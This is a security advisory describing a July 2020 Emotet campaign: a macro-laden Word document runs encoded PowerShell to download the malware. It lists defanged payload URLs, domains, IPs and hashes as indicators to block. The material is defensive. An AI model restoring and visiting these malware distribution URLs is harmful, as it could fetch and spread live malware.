Rewterz Threat Alert – Emotet Still Active

Rewterz Threat Alert – SNOW Serves as Maze Loader in Active Campaigns

July 24, 2020

Rewterz Threat Advisory – CVE-2020-3452 – Cisco Network Security Flaw Leaks Sensitive Data

July 24, 2020

Rewterz Threat Alert – Emotet Still Active – IoCs

Severity

High

Analysis Summary

Emotet is still active in the wild with its July 2020 campaign. The campaign uses a malicious Microsoft Word document, and gets creative with the appeal to enable content. Below is the attack flow.

VMRay Analyzer Report showing verdict and process graph of a sample from Emotet campaign July 2020.

The document uses a highly obfuscated macro that begins to be executed when opened. The macro starts a Powershell instance with encoded commands as a program argument. These commands then try to download Emotet from five hardcoded hosts and save it with a fixed name specified in the command itself (later moved to %AppData%\msvcr100\).

Impact

Credential Theft
Information Theft
Financial Theft

Indicators of Compromise

Domain Name

mapas[.]hoonicorns[.]pt
www[.]20190607[.]com
connect-plus[.]co[.]uk
lovely-lollies[.]com

MD5

d40863c1d11d96d51e09252558e09946

SHA-256

cc4e6e42f73500c72d0d0820b4a3c131e2f8fce4d7d730eb8f9fc1b5cc3e882e

SHA1

f4a52b0eccaaebfeb65ee380be4c10c114d0fcfb

Source IP

212[.]51[.]142[.]238
198[.]144[.]158[.]120
109[.]117[.]53[.]230

URL

http[:]//mapas[.]hoonicorns[.]pt/comp3/ly8cmti/
https[:]//lovely-lollies[.]com/wp-admin/fgvid/
https[:]//connect-plus[.]co[.]uk/aspnet_client/3yey3rr/
https[:]//www[.]angage[.]com/wp-content/mtincvc/
http[:]//www[.]20190607[.]com/wp-admin/ixyjozs/

Remediation

Block the threat indicators at respective controls.
Do not download email attachments coming from untrusted email addresses.
Do not enable macros for untrusted files.